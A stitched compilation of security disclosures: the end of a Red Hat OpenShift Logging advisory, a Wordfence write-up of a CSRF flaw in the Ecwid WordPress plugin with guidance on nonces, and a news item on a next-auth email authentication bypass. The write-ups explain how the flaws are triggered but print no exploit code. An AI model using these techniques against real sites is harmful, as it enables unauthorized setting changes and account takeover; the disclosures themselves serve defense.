(CVE-2021-38561)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply  
this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1621  
https://access.redhat.com/security/cve/CVE-2022-1629  
https://access.redhat.com/security/cve/CVE-2022-21540  
https://access.redhat.com/security/cve/CVE-2022-21541  
https://access.redhat.com/security/cve/CVE-2022-22576  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-27774  
https://access.redhat.com/security/cve/CVE-2022-27776  
https://access.redhat.com/security/cve/CVE-2022-27782  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/cve/CVE-2022-34169  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuwKd9zjgjWX9erEAQgexxAAmIzleGnLdCBu+yeCdCPsxjElzuAtfH8+  
HhAEjuIYf2vyZqIB+Pa8ghittm/s1HSv1nPAfsJBLcOY2szNZLZ/T5hwKqIDQ4M2  
b36IYTskfz0BZ0C7tha6pQF6ihc/EgVa1CfDgyQEzosDoUVZRyLUEZBh7TrD9Y8O  
mcDhUSDBFVPN3II1U40qANMi+KlkW47YjcVCR+erfG8yscoqFoD9QTmuV/JzoioL  
tBsL3CQTAjs7+bwuF8Jyh3bb4fQxjtLeh+U4D6p0Inn9soPsHTOBe5/zU5wHJtRe  
v1IW1zYgblBPUqD6n5RUzSTKmreQX+aOJLZNuY8PfFOtcMLOcYJyoz1LRFNf0Hym  
68NLNGJ0DGISmRVGBemXiwusYGtWvHgzbQWzpdXA4s2z5skjIZ8O9+iTZng9AlX3  
YsGcvMKfnCrhfFSbGYWPBZwlm0hRE/++Tfw1i110pEPdfqspH5ZvtBhrQux3COn7  
xJmK6bZVUz2MEhH02NfwdFaP8Gjd4FoRGOIqxdBrvj8TOnJIKd7npOEXS5ovgetp  
NtwkwPlt8tAB/ZQU1X4DIa84IDrEdiL88ys3KxdCtKYO3fY0Hx7DOVQqeGEdAcQ8  
HSZnALjLRyjYJ7vRE2aIUqHPW9Rh9je8vsb54UR8w/ofuYawR1evMie2OT4PSFWP  
YR+hkO1lWmo=j+Pi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5908-01

WordPress Ecwid Ecommerce Shopping Cart plugin versions 6.10.23 and below suffer from a cross site request forgery vulnerability.

Description: Cross-Site Request Forgery to Settings/Options Update

Affected Plugin: Ecwid Ecommerce Shopping Cart

Plugin Slug: ecwid-shopping-cart

Affected Versions: <= 6.10.23

CVE ID: CVE-2022-2432

CVSS Score: 8.8 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Researcher/s: Marco Wotschka

Fully Patched Version: 6.10.24

Ecwid Ecommerce Shopping Cart is a plugin offered by Lightspeed that allows site owners to set up an eCommerce store on a WordPress website and then sync it across various services such as Amazon and social media. It also offers ad integration and access to marketing tools. As part of the plugin’s functionality, there were some more advanced settings that could be managed. Unfortunately, this was implemented insecurely making it possible for attackers to update these settings via a forged request.

More specifically, the plugin provides the following admin_post action hooked to the ‘ecwid_update_plugin_params‘ function for that purpose:

[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgGRrW4wJp7s4LR8_8W5GZxc55cBM_qW8hSV9n7QFM8MW16sCxG5h4mMrW8RWrLm7fnSqrW70Vz_q4PPYx1W6cGQ985xBh94W4KV7Yy3dzXV8W8bTSFR1sB2J5N60tSb8sMfWmW3Qhxq480ZZDvW6qNFsM4YqZm2W47Fl6f537-gRW8G9Mq25QpGZZW2B_hWM7ZNSZrW8jJ9gf8MSG0pW3c2FG27vDxqyW24KmsZ1HxD3TW6BS5rM4h9TL_W4My4sZ2R5dngW7nrf8C81zMWXW1bBRCq4lYLdfW5Wd9gF2rjpt7W2b9RlV7CGYQ8W4sgGCX98nMgqW1FPwLN10ndByW6yw5YW7rm4RLW1l8_qC5kZvHYW5kyvmH8qjwnbW6cS_Sd2f9WPjM-RF9H50XrYW6d-cP13xx9gWW8Jr_cw26btsNW30S0Xr6gZ41G36ft1 )

An initial check in the ‘ecwid_update_plugin_params‘ function ensures that the current user is allowed to manage site options, which is a capability that belongs to administrators. However, the nonce check performed shortly after is only executed if a nonce is set due to how the function uses && to combine the checks to validate that a nonce is present in the request and to verify that the nonce is valid. This means that if the wp-nonce parameter is not supplied in the request, the verification step is skipped. This makes the functionality susceptible to Cross-Site Request Forgery attacks in vulnerable versions.

[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgK04W67C43l5f9PlsW1vTzZ291zXDyW7lwxqt5S_SqhW8qMCLs5Vs8hTMlVtTSW5m53W8jPcbS3cs9wpW6xWDF_2xbLMZN7RfvGrn4vjHVXqXzJ3XzQ-1W3SsZJk5qWZY5W7tNvtn7z-pFSW2T45NG8qgmVjW4mZN5T8CCQR4W4X-xkp3MRyMBW8bQV2l1QmfF2W1N6yKt2SKNJxV9hRB01Dr8M4N4LKmRgHfRR-N5f00LN8JsxlVQCRGg9b5QQgVm1Wrc2NkSRpN22l9qWLg4rRW20bJdN7F1XgdN36zDyK1TZzNW6Fk9mV1Y1vkJW7zJyHY4w7XrNW6YPJyL4yxX2PW6qVHnh960fF3W8yZq6C8Nfqr_VkfJpP34G9dBW7J4NVS8plYskN1tn7-6tGsPRW3vNTQ14zxQXMW2gFKwm8yhK853nT51 )

This makes it possible for an attacker to change the ecwid_store_id, which uniquely identifies the store and is needed for support requests as well as for embedding the store on other sites. Another site option that could be modified is the site’s ecwid_store_page_id, which is the storefront page in the WordPress installation. Both of these settings may result in a loss of availability of the storefront if changed to an invalid store ID. There are several other settings that could be affected in addition to those two. The plugin does not provide a direct link to the settings page in any of its menus and a warning on the page suggests that modifying these settings may significantly affect the plugin functionality.

The Importance of Properly Implementing Nonces

Nonces are a critical component used to prevent Cross-Site Request Forgery vulnerabilities. As such, it’s important to ensure they are properly implemented throughout plugin and theme code to prevent unauthorized execution of that code. Fortunately, WordPress provides several mechanisms to create and validate proper nonces.

Nonce Creation

The first step to proper nonce implementation is nonce creation.

One option to properly implement nonce creation involves the wp_nonce_url() function. This function expects a target URL as well as an action and an optional nonce name. The nonce will be added to a URL and can be verified by a nonce validation function that is executed in the same or subsequent function. This makes it possible for developers to provide links to perform actions such as deletion of posts with a proper nonce that allows the code to verify that the action was initiated from within the site as opposed to a click on a link elsewhere, such as in an email.

An additional option is adding a nonce to a form to secure any submissions originating from that form. The function wp_nonce_field() is frequently used in these cases and expects an action string. This will add a hidden input field to the form. Upon form submission, the created nonce can be checked and verified.

Finally, a nonce can also be generated using wp_create_nonce(), which accepts an action string argument and returns just a nonce. This can be implemented in a variety of different ways and allows more flexibility as a developer to implement nonce validation. We frequently see this function contained in HTML on setting pages that is later used to validate the origin of the request when saving those settings.

Remember that nonces are specific to individual users and sessions and are invalidated after 24 hours, or on logout.

Nonce Validation

The second step to proper nonce implementation involves nonce verification. A plugin can implement an appropriate nonce on a form or settings update, but without proper validation of that nonce, there won’t be adequate protection.

The first option to properly validate a nonce involves the use of the check_admin_referer() function. This function accepts the protected action as well as the name of the nonce as an argument and checks the nonce as well as the referer, thus helping to ensure that the nonce provided is correct and that the request was initiated from an admin page.

When implementing an AJAX action, the check_ajax_referer() function can be used. This will verify the nonce but will not check the referer like the check_admin_referer() function does although it will validate that the request is an AJAX request.

A final option for validating a nonce is the more general wp_verify_nonce() function. With this function, an action and nonce name will need to be supplied, and it will verify that the proper nonce was set. This provides the most flexible implementation of nonce validation for developers.

In the case of today’s disclosure, the nonce was created on the settings form itself with wp_create_nonce():

[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgF42W98C5CQ5NDR3nN58bq_96Ch4zW3GRvs_6bwRX5W3tsvrb2ShCghW3x06W68pRQH9W3Dg71b6v1HrYN1qR5fbY2lRlW1k5j_14xFFJHW7X-WLl1rqWk4W2Xtb8w2ZQV1fW60H5QG1l9dtQW4FrrX83gDD31W6PL9cT6F_6LvW370m6b2hcXrhW87SST67k_CFgW5-p6J61CRPtqW41Q3yy1ZncNXW3tf7LN7M0RtnVB_kYq1ywQZZW5nCmTg91v6g7W7d0m-m6FkNhhW7ZJZnp8SNnfqW8slWGB5dKbwfW6hRPqV27VwPwN6VYg76H73KcW5RSHN32P4qKzW87nrK28tmgf3W9kClqb5c9kpxW4sNhxd6ZtC1NW4W6S6N4tX1hSW8VG37Z822PTvW3vQSg86XJbffMW8y1Kj7SkzW8qWmSB1p6tWz33Jt1 )

As you can see, this statement will call wp_verify_nonce() but only if the nonce is set due to the if (isset($_POST['wp-nonce']) check and the use of && in combination with the wp_verify_nonce() function. Therefore, if the nonce is omitted, this check will not take place.

[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgYDJW4r9V7C4zvxxJW8nbMdr8F-cRDW2rwyLJ1CP2WHW4J-5Pl31WzP1W6DVyjb8Z3jqdN4stQLdG_ZkNW4mglnq1G8sRNW5mXcDc3VtGGNW4FY3bS3VJv8bW81wTgx9bFbTPV1C4Hj2mqjn2W34wsp890BqJ4W3mYsyR7j1ZmkW3N5y145YdY3JW1y9Jw7794yXvN8-B_JcFVNZ3W7qmWfy4_SYqlW8phV2n20Y2n1VY28TM2d1DnBVmThSG3kLmm9W3w1Qb8274pyfW3DMgQT1d69drW1Z_vwR8tNJ00W5VhJ9W1WWjw5V21_7j12XCNfW4nmmL65HjtPhW6bzWt73Vyc5XW49_SzN8D05kRW1p_M0l1RcrzgN5kXSx6thPmgW6kq5wb8y9lv7W2wb9d72F0qKFW6RJdQV89RNSpN1_lhTsk65Q51P1 )

This serves as an important reminder to not only properly implement nonces and validation checks but also to ensure that the check fails when the nonce value is empty or otherwise not present.

As a final important note: never rely on nonce checks alone. Developers should always remember to include a capability check using a function like current_user_can() in order to ensure the user initiating the action is indeed allowed to perform it. Nonces should never be used for authentication, authorization or any form of access control as they are simply intended to verify the origin of the request, and do not perform any authorization.

Timeline

June 24, 2022 – Initial outreach to the plugin developer.

July 11, 2022 – We escalate the issue to the WordPress.org plugins team and send them the full disclosure details.

July 13, 2022 – The vulnerability is patched in version 6.10.24.

Conclusion

In today’s post, we covered a vulnerability in the Ecwid Ecommerce Shopping Cart plugin that could be used to trick site administrators into updating plugin settings due to improper nonce verification. The vulnerability was patched by ensuring that a proper nonce was set and by verifying it.

Please remember that due to the nature of Cross-Site Request Forgery vulnerabilities, it is not possible to provide adequate protection via the Wordfence firewall without blocking legitimate requests. As such, we highly recommend updating to version 6.10.24 or higher of Ecwid Ecommerce Shopping Cart to ensure that your site is protected against any exploits targeting this vulnerability.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Ecwid Ecommerce Shopping Cart as soon as possible.

WordPress Ecwid Ecommerce Shopping Cart 6.10.23 Cross Site Request Forgery

Vulnerability has been patched in latest versions

Vulnerability has been patched in latest versions

  

A critical authentication bypass flaw in an NPM package could allow a malicious actor to take over a victim’s email account.

The vulnerability, which was rated a CVSS score of 9.1, was present in Nextauth.js, an open source authentication package for next.js applications.

Users of NPM package next-auth who are using the either in versions before 4.10.3 or 3.29.10 are affected by the bug, a security advisory warns.

Read more of the latest web security vulnerability news

If an attacker could forge a request that sent a comma-separated list of emails, for example , to the sign-in endpoint, Nextauth.js would send emails to both the attacker and to the victim’s email addresses.

The attacker could then login as a newly created user with the email being .

Basic authorization such as in the callback would fail to communicate a threat to the developer and would let the attacker bypass authorization, even with an @attacker.com address.

**Patched**

The vulnerability has been patched by maintainers in v4.10.3 and v3.29.10 by normalizing the email value that is sent to the sign-in endpoint before accessing it anywhere else.

“We also added a callback on the configuration, where you can further tweak your requirements for what your system considers a valid email address,” wrote the maintainers.

A detailed workaround is also available for any users who cannot patch, however updating to the latest version is recommended.

YOU MAY ALSO LIKE Trio of XSS bugs in open source web apps could lead to complete system compromise

Tag

#js